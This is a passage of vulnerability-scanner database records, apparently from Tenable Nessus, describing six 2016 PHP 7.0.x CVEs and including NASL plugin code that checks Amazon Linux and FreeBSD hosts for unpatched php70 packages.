php_wddx_push_element() function within file ext/wddx/wddx.c when handling an incorrect boolean element, which leads to mishandling the wddx_deserialize() call. An unauthenticated, remote attacker can exploit this, via a specially crafted wddxPacket XML document, to cause a denial of service condition. (CVE-2016-7418)\n\n - An out-of-bounds access error exists in the phar_parse_tarfile() function within file ext/phar/tar.c when handling the verification of signatures. An unauthenticated, remote attacker can exploit this to cause an unspecified impact.\n\nNote that this software is reportedly affected by other vulnerabilities as well that have not been fixed yet in version 7.0.13.", "cvss3": {}, "published": "2019-01-09T00:00:00", "type": "nessus", "title": "PHP 7.0.x < 7.0.11 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98835", "href": "https://www.tenable.com/plugins/was/98835", "sourceData": "No source data", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:12", "description": "ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata (CVE-2016-7412).\n\nUse-after-free vulnerability in the wddx_stack_destroy function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a wddxPacket XML document that lacks an end-tag for a recordset field element, leading to mishandling in a wddx_deserialize call (CVE-2016-7413).\n\nThe ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c (CVE-2016-7414).\n\next/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x before 7.0.11 does not properly restrict the locale length provided to the Locale class in the ICU library, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a MessageFormatter::formatMessage call with a long first argument (CVE-2016-7416).\n\next/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11 proceeds with SplArray unserialization without validating a return value and data type, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data (CVE-2016-7417).\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call (CVE-2016-7418).", "cvss3": {}, "published": "2016-10-13T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php70 (ALAS-2016-754)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php70", "p-cpe:/a:amazon:linux:php70-bcmath", "p-cpe:/a:amazon:linux:php70-cli", "p-cpe:/a:amazon:linux:php70-common", "p-cpe:/a:amazon:linux:php70-dba", "p-cpe:/a:amazon:linux:php70-dbg", "p-cpe:/a:amazon:linux:php70-debuginfo", "p-cpe:/a:amazon:linux:php70-devel", "p-cpe:/a:amazon:linux:php70-embedded", "p-cpe:/a:amazon:linux:php70-enchant", "p-cpe:/a:amazon:linux:php70-fpm", "p-cpe:/a:amazon:linux:php70-gd", "p-cpe:/a:amazon:linux:php70-gmp", "p-cpe:/a:amazon:linux:php70-imap", "p-cpe:/a:amazon:linux:php70-intl", "p-cpe:/a:amazon:linux:php70-json", "p-cpe:/a:amazon:linux:php70-ldap", "p-cpe:/a:amazon:linux:php70-mbstring", "p-cpe:/a:amazon:linux:php70-mcrypt", "p-cpe:/a:amazon:linux:php70-mysqlnd", "p-cpe:/a:amazon:linux:php70-odbc", "p-cpe:/a:amazon:linux:php70-opcache", "p-cpe:/a:amazon:linux:php70-pdo", "p-cpe:/a:amazon:linux:php70-pdo-dblib", "p-cpe:/a:amazon:linux:php70-pgsql", "p-cpe:/a:amazon:linux:php70-process", "p-cpe:/a:amazon:linux:php70-pspell", "p-cpe:/a:amazon:linux:php70-recode", "p-cpe:/a:amazon:linux:php70-snmp", "p-cpe:/a:amazon:linux:php70-soap", "p-cpe:/a:amazon:linux:php70-tidy", "p-cpe:/a:amazon:linux:php70-xml", "p-cpe:/a:amazon:linux:php70-xmlrpc", "p-cpe:/a:amazon:linux:php70-zip", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-754.NASL", "href": "https://www.tenable.com/plugins/nessus/94020", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-754.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94020);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_xref(name:\"ALAS\", value:\"2016-754\");\n\n script_name(english:\"Amazon Linux AMI : php70 (ALAS-2016-754)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before\n7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag,\nwhich allows remote MySQL servers to cause a denial of service\n(heap-based buffer overflow) or possibly have unspecified other impact\nvia crafted field metadata (CVE-2016-7412).\n\nUse-after-free vulnerability in the wddx_stack_destroy function in\next/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows\nremote attackers to cause a denial of service or possibly have\nunspecified other impact via a wddxPacket XML document that lacks an\nend-tag for a recordset field element, leading to mishandling in a\nwddx_deserialize call (CVE-2016-7413).\n\nThe ZIP signature-verification feature in PHP before 5.6.26 and 7.x\nbefore 7.0.11 does not ensure that the uncompressed_filesize field is\nlarge enough, which allows remote attackers to cause a denial of\nservice (out-of-bounds memory access) or possibly have unspecified\nother impact via a crafted PHAR archive, related to ext/phar/util.c\nand ext/phar/zip.c (CVE-2016-7414).\n\next/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x\nbefore 7.0.11 does not properly restrict the locale length provided to\nthe Locale class in the ICU library, which allows remote attackers to\ncause a denial of service (application crash) or possibly have\nunspecified other impact via a MessageFormatter::formatMessage call\nwith a long first argument (CVE-2016-7416).\n\next/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11\nproceeds with SplArray unserialization without validating a return\nvalue and data type, which allows remote attackers to cause a denial\nof service or possibly have unspecified other impact via crafted\nserialized data (CVE-2016-7417).\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP before\n5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial\nof service (invalid pointer access and out-of-bounds read) or possibly\nhave unspecified other impact via an incorrect boolean element in a\nwddxPacket XML document, leading to mishandling in a wddx_deserialize\ncall (CVE-2016-7418).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-754.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php70' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pdo-dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php70-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-bcmath-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-cli-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-common-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-dba-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-dbg-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-debuginfo-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-devel-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-embedded-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-enchant-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-fpm-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-gd-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-gmp-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-imap-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-intl-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-json-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-ldap-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-mbstring-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-mcrypt-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-mysqlnd-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-odbc-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-opcache-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pdo-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pdo-dblib-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pgsql-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-process-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pspell-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-recode-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-snmp-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-soap-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-tidy-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-xml-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-xmlrpc-7.0.11-1.16.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-zip-7.0.11-1.16.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php70 / php70-bcmath / php70-cli / php70-common / php70-dba / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:26", "description": "PHP reports :\n\n- Fixed bug #73007 (add locale length check)\n\n- Fixed bug #72293 (Heap overflow in mysqlnd related to BIT fields)\n\n- Fixed bug #72928 (Out of bound when verify signature of zip phar in phar_parse_zipfile)\n\n- Fixed bug #73029 (Missing type check when unserializing SplArray)\n\n- Fixed bug #73052 (Memory Corruption in During Deserialized-object Destruction)\n\n- Fixed bug #72860 (wddx_deserialize use-after-free)\n\n- Fixed bug #73065 (Out-Of-Bounds Read in php_wddx_push_element)", "cvss3": {}, "published": "2016-10-17T00:00:00", "type": "nessus", "title": "FreeBSD : PHP -- multiple vulnerabilities (f471032a-8700-11e6-8d93-00248c0c745d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php70", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_F471032A870011E68D9300248C0C745D.NASL", "href": "https://www.tenable.com/plugins/nessus/94084", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94084);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n\n script_name(english:\"FreeBSD : PHP -- multiple vulnerabilities (f471032a-8700-11e6-8d93-00248c0c745d)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP reports :\n\n- Fixed bug #73007 (add locale length check)\n\n- Fixed bug #72293 (Heap overflow in mysqlnd related to BIT fields)\n\n- Fixed bug #72928 (Out of bound when verify signature of zip phar in\nphar_parse_zipfile)\n\n- Fixed bug #73029 (Missing type check when unserializing SplArray)\n\n- Fixed bug #73052 (Memory Corruption in During Deserialized-object\nDestruction)\n\n- Fixed bug #72860 (wddx_deserialize use-after-free)\n\n- Fixed bug #73065 (Out-Of-Bounds Read in php_wddx_push_element)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-7.php#7.0.11\"\n );\n # https://vuxml.freebsd.org/freebsd/f471032a-8700-11e6-8d93-00248c0c745d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?556e252c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php70<7.0.11\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:10:22", "description": "According to its banner, the version of PHP running on the remote web server is 7.0.x prior to 7.0.11. It is, therefore, affected by multiple vulnerabilities :\n\n - An heap buffer overflow condition exists in the php_mysqlnd_rowp_read_text_protocol_aux() function within file ext/mysqlnd/mysqlnd_wireprotocol.c due to a failure to verify that a BIT field has the UNSIGNED_FLAG flag. An unauthenticated, remote attacker can exploit this, via specially crafted field metadata, to cause a denial of service condition. (CVE-2016-7412)\n\n - A use-after-free error exists in the wddx_stack_destroy() function within file ext/wddx/wddx.c when deserializing recordset elements.\n An unauthenticated, remote attacker can exploit this, via a specially crafted wddxPacket XML document, to cause a denial of service condition. (CVE-2016-7413)\n\n - An out-of-bounds access error exists in the phar_parse_zipfile() function within file ext/phar/zip.c due to a failure to ensure that the uncompressed_filesize field is large enough. An unauthenticated, remote attacker can exploit this, via a specially crafted archive, to cause a denial of service condition. (CVE-2016-7414)\n\n - A stack-based buffer overflow condition exists in the ICU4C library, specifically within file common/locid.cpp in the msgfmt_format_message() function, due to a failure to properly restrict the locale length provided to the Locale class. An unauthenticated, remote attacker can exploit this, via a long first argument to a MessageFormatter::formatMessage() function call, to cause a denial of service condition. (CVE-2016-7416)\n\n - A flaw exists in the spl_array_get_dimension_ptr_ptr() function within file ext/spl/spl_array.c due to a failure to properly validate the return value and data type when deserializing SplArray. An unauthenticated, remote attacker can exploit this, via specially crafted serialized data, to cause a denial of service condition.\n (CVE-2016-7417)\n\n - An out-of-bounds read error exists in the php_wddx_push_element() function within file ext/wddx/wddx.c when handling an incorrect boolean element, which leads to mishandling the wddx_deserialize() call. An unauthenticated, remote attacker can exploit this, via a specially crafted wddxPacket XML document, to cause a denial of service condition. (CVE-2016-7418)\n\n - An out-of-bounds access error exists in the phar_parse_tarfile() function within file ext/phar/tar.c when handling the verification of signatures. An unauthenticated, remote attacker can exploit this to cause an unspecified impact.", "cvss3": {}, "published": "2016-09-22T00:00:00", "type": "nessus", "title": "PHP 7.0.x < 7.0.11 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_7_0_11.NASL", "href": "https://www.tenable.com/plugins/nessus/93657", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93657);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-7412\",\n \"CVE-2016-7413\",\n \"CVE-2016-7414\",\n \"CVE-2016-7416\",\n \"CVE-2016-7417\",\n \"CVE-2016-7418\"\n );\n script_bugtraq_id(\n 93004,\n 93005,\n 93006,\n 93007,\n 93008,\n 93011\n );\n\n script_name(english:\"PHP 7.0.x < 7.0.11 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 7.0.x prior to 7.0.11. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An heap buffer overflow condition exists in the\n php_mysqlnd_rowp_read_text_protocol_aux() function\n within file ext/mysqlnd/mysqlnd_wireprotocol.c due to\n a failure to verify that a BIT field has the\n UNSIGNED_FLAG flag. An unauthenticated, remote attacker\n can exploit this, via specially crafted field metadata,\n to cause a denial of service condition. (CVE-2016-7412)\n\n - A use-after-free error exists in the\n wddx_stack_destroy() function within file\n ext/wddx/wddx.c when deserializing recordset elements.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted wddxPacket XML document, to\n cause a denial of service condition. (CVE-2016-7413)\n\n - An out-of-bounds access error exists in the\n phar_parse_zipfile() function within file ext/phar/zip.c\n due to a failure to ensure that the\n uncompressed_filesize field is large enough. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted archive, to cause a denial of service\n condition. (CVE-2016-7414)\n\n - A stack-based buffer overflow condition exists in the\n ICU4C library, specifically within file common/locid.cpp\n in the msgfmt_format_message() function, due to a\n failure to properly restrict the locale length provided\n to the Locale class. An unauthenticated, remote attacker\n can exploit this, via a long first argument to a\n MessageFormatter::formatMessage() function call, to\n cause a denial of service condition. (CVE-2016-7416)\n\n - A flaw exists in the spl_array_get_dimension_ptr_ptr()\n function within file ext/spl/spl_array.c due to a\n failure to properly validate the return value and data\n type when deserializing SplArray. An unauthenticated,\n remote attacker can exploit this, via specially crafted\n serialized data, to cause a denial of service condition.\n (CVE-2016-7417)\n\n - An out-of-bounds read error exists in the\n php_wddx_push_element() function within file\n ext/wddx/wddx.c when handling an incorrect boolean\n element, which leads to mishandling the\n wddx_deserialize() call. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n wddxPacket XML document, to cause a denial of service\n condition. (CVE-2016-7418)\n\n - An out-of-bounds access error exists in the\n phar_parse_tarfile() function within file ext/phar/tar.c\n when handling the verification of signatures. An\n unauthenticated, remote attacker can exploit this to\n cause an unspecified impact.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://secure.php.net/ChangeLog-7.php#7.0.11\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.0.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7417\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 